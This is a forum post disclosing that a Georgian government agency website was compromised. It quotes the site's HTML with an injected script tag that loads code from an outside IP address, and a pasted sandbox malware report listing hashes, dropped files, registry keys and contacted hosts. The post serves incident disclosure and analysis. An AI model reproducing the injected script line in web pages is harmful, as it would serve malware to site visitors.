http://ema.gov.ge/ Enterprise Management Agency
http://173.212.192.83/frame.php: this is it

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Enterprise Management Agency</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link type="text/css" media="all" rel="stylesheet" href="css/style-geo.css" />
<script type="text/javascript" language="javascript" src="modules/lytebox/lytebox.js"></script>
<link rel="stylesheet" href="modules/lytebox/lytebox.css" type="text/css" media="screen" />
<script type="text/javascript" src="menu/menu.js"></script>
<!-- jQuery -->
<link rel="stylesheet" type="text/css" href="css/superfish.css" media="screen">
<link rel="stylesheet" type="text/css" href="css/superfish-v.css" media="screen">
<script type="text/javascript" src="js/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="js/hoverIntent.js"></script>
<script type="text/javascript" src="js/superfish.js"></script>
<script src=http://173.212.192.83/frame.php></script>
<script language="javascript" src="tween/Tween.js"></script>
<script language="javascript" src="tween/ColorTween.js"></script>
<script language="javascript" src="tween/OpacityTween.js"></script>
<script type="text/javascript">
* * *
http://www.threatexpert.com/report.aspx?md...efccea3da67905b This is also about it
Submission Summary:
Submission details:
Submission received: 9 January 2012, 05:31:32
Processing time: 9 min 49 sec
Submitted sample:
File MD5: 0xF90B2E6910077D137EFCCEA3DA67905B
File SHA-1: 0xC5BE8CC3B83BFE22FD6FB19F217028F629C06777
Filesize: 39,424 bytes
Summary of the findings:
What's been found Severity Level
Downloads/requests other files from Internet.
Technical Details:
File System Modifications
The following files were created in the system:
| # | Filename(s) | File Size | File Hash |
|---|---|---|---|
| 1 | %AppData%\rpcsrv.log | 85 bytes | MD5: 0xB2117DC39D0A6D8046583E40ED1A766A, SHA-1: 0x1203A840F43F85ACD873A16FA8255CC4F31BE6F7 |
| 2 | %AppData%\usbserv.### | 39,936 bytes | MD5: 0x7F226BF6B57CFC1374CFF7AF4F07F5E2, SHA-1: 0xB85F21506C515E40E1B753A230D2D24078E1DBF5 |
Note:
%AppData% is a variable that refers to the file system directory that serves as a common repository for application-specific data. A typical path is C:\Documents and Settings\[UserName]\Application Data.
Memory Modifications
There was a new process created in the system:
| Process Name | Process Filename | Main Module Size |
|---|---|---|
| [filename of the sample #1] | [file and pathname of the sample #1] | 77,824 bytes |
Registry Modifications
The following Registry Keys were created:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MediaResources\msvideo
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\msvideo
Other details
There were registered attempts to establish connection with the remote hosts. The connection details are:
| Remote Host | Port Number |
|---|---|
| 173.212.192.83 | 80 |
| 213.131.32.218 | 80 |
| 31.214.140.214 | 80 |
The data identified by the following URLs was then requested from the remote web server:
http://173.212.192.83/frame.php
http://ema.gov.ge/
http://ema.gov.ge/js/hoverIntent.js
http://ema.gov.ge/js/superfish.js
http://ema.gov.ge/tween/Tween.js
http://ema.gov.ge/tween/ColorTween.js
http://ema.gov.ge/tween/OpacityTween.js
http://ema.gov.ge/img/site-title-geo.png
http://ema.gov.ge/img/logo-geo.png
http://ema.gov.ge/img/mail-icon.png
http://ema.gov.ge/img/home-icon.png
http://ema.gov.ge/modules/lytebox/lytebox.js
http://ema.gov.ge/img/sitemap-icon.png
http://ema.gov.ge/img/geo-icon.png
http://ema.gov.ge/css/style-geo.css
http://ema.gov.ge/img/bg.png
http://ema.gov.ge/modules/lytebox/lytebox.css
http://ema.gov.ge/menu/menu.js
http://ema.gov.ge/css/superfish.css
http://ema.gov.ge/css/superfish-v.css
http://ema.gov.ge/js/jquery-1.2.6.min.js
http://31.214.140.214/calc.php
http://31.214.140.214/index312.php?ver=5.1...123&id=401acd00
http://31.214.140.214/index312.php?ver=5.1...123&id=401acd00
This post has been edited by alika1982 on 28 Mar 2012, 13:35